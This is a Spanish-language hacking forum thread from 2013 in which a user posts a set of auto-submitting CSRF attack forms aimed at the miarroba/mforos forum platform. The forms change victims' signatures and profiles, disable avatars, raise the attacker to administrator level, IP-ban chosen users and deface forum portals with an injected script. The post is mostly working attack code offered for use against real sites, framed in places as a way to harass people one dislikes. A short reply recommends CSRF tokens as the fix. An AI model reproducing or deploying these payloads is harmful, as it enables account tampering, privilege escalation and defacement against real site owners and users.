CSRF'S miarroba forums [By Pekador]

Iniciado por Réplica1, Agosto 27, 2013, 09:39:34 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 27, 2013, 09:39:34 AM Ultima modificación: Agosto 27, 2013, 04:04:55 PM por Pekador
Para cambiar la firma de cualquier foro mi@

Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://netpoison.mforos.com/options/" method=post name="csrf1">
<input type="hidden" name="firma" value="Underc0de.org">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">


-----------------------------------------------------------------------------------------------------

Este csrf se tarda mas en ejecutarlo ya que por cada palabra lo tienes que subir a un hosting distinto pero sigue valiendo, lo que ara es una vez que alla filtrado esa palabra se redirigira a el otro csrf y se filtraba y así sucesivamente es algo 'molesto' pero sigue valiendo!

lo que hace es filtrar palabras como 'hola' por la palabra que queramos.

Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/filtro_palabras.php?id=2099129" method=post name="csrf1">
<input type="hidden" name="original" value="hola">
<input type="hidden" name="filtrada" value="Underc0de.org">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">

<?php
header('Location: otrocsrf.com');
?>


---------------------------------------------------------------------------------------------------------------------------

Con este csrf desactivas el avatar o la firma a cualquier usuario permanentemente asta que la vuelvan activar

Firma:


Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://netpoison.mforos.com/users/crackme/" method=post name="csrf1">
<input type="hidden" name="tabla_boton" value="Desactivar firma">
<body onload="envio_csrf()">



Avatares: 


Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://netpoison.mforos.com/users/crackme/" method=post name="csrf1">
<input type="hidden" name="boton" value="Desactivar avatares">
<body onload="envio_csrf()">


------------------------------------------------------------------------------------------------------------------------------

Con este csrf puedes elevarte los privilegios a administrador


Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://teamhackworld.mforos.com/users/crackme/" method=post name="csrf1">
<input type="hidden" name="nuevo_nivel" value="999">
<input type="hidden" name="accion" value="Cambiar nivel">
<body onload="envio_csrf()">


-------------------------------------------------------------------------------------------------------------------------------

Esta sirve para crear un subforo nuevo

Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/nuevo_subforo.php?id=2099129" method=post name="csrf1">
<input type="hidden" name="forotitulo" value="Underc0de.org">
<input type="hidden" name="forodesc" value="El mejor foro">
<input type="hidden" name="txp" value="100">
<input type="hidden" name="mxp" value="100">
<input type="hidden" name="activacode" value="no">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">


---------------------------------------------------------------------------------------------------------------------------

Este csrf cambia los datos generales de tu usuario de mi@, tu nombre real, tu website, intereses, aficiones, firma etc

Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://privados.miarroba.es/#!new" method=post name="csrf1">
<input type="hidden" name="homepage" value="www.Underc0de.org">
<input type="hidden" name="nombre" value="Pekador">
<input type="hidden" name="apellidos" value="Revise su seguridad">
<input type="hidden" name="firma" value="Visita Underc0de">
<input type="hidden" name="descripcion" value="CSRF">
<input type="hidden" name="aficiones" value="Underc0de.org">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">


--------------------------------------------------------------------------------------------------------------------------

Estos de mi@ tienen mas csrf en sus foros ..., aquí os dejo otro esta vez para banear por ip ¿te cae mal alguien y te sabes su ip? banealo de cualquier foro mi@ ;D

para sacar la id del foro, poner /admin despues de la url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/baneo_ip.php?id=2099129&do=new" method=post name="csrf1">
<input type="hidden" name="text" value="Aquí la ip que quieran banear">
<input type="hidden" name="motivo" value="//**Underc0de.org**//">
<input type="hidden" name="time" value="30">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">


-------------------------------------------------------------------------------------------------------------------------------

Buenas aquí os dejo este csrf para mi@ que sirve para cambiar la url del foro, entre otras cosas menos importantes :D

necesitaremos la id del foro, se consige poniendo /admin despues de la url del foro

Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/general.php?id=2099129" method=post name="csrf1">
<input type="hidden" name="titulo" value="Underc0de"> // 
<input type="hidden" name="nombre" value=".org">
<input type="hidden" name="descripcion" value="Underc0de.org">
<input type="hidden" name="categoria" value="10">
<input type="hidden" name="tagsService[]" value="pwned">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">


-----------------------------------------------------------------------------------------------------------------------------------

Cambia el nombre de la cuenta de mi@

Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://miarroba.es/usuarios/modificar.php" method=post name="csrf1">
<input type="hidden" name="privacidad" value="registrados">
<input type="hidden" name="nick" value="Underc0de">
<input type="hidden" name="pais" value="12">
<input type="hidden" name="provincia" value="192">
<input type="hidden" name="zipcode" value="60155">
<input type="hidden" name="sexo" value="Hombre">
<input type="hidden" name="dia" value="5">
<input type="hidden" name="mes" value="11">
<input type="hidden" name="ano" value="1994">
<input type="hidden" name="boletin" value="si">
<input type="hidden" name="promos" value="si">
<input type="hidden" name="accion" value="update">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">


------------------------------------------------------------------------------------------------------------------------------------

Rara defacear el portal de cualquier foro de mi@ claro que tenga el portal activado

Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foros.miarroba.es/portal.php?id=2037885&seccion=crear_contenido&tipo=personalizado" method=post name="csrf1">
<input type="hidden" name="titulo" value="Pekador">
<input type="hidden" name="codigo" value="<script>document.documentElement.innerHTML='<iframe width=100% height=100% src=URL DEFACE>';</script>">
<input type="hidden" name="columna" value="2">
<input type="hidden" name="nivelmin" value="0">
<input type="hidden" name="nivelmax" value="0">
<input type="hidden" name="tipo" value="personalizado">
<input type="hidden" name="boton_continuar" value="Continuar">
<body onload="envio_csrf()">


---------------------------------------------------------------------------------------------------------------------------------------

Reportado: Sí, pero el dueño no sabe fixearlas yo le ofrecí mi ayuda y la rechazo.

Y hay muchos mas, esto demuestra la seguridad de esos foro saludos y hasta la próxima.
Agosto 27, 2013, 04:50:32 PM #1
Excelente post compa, al dueño le haría bien colocar token para evitar los ataques CSRF's..

Saludos!
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)
Imprimir
Ir Arriba Páginas1
Acciones del Usuario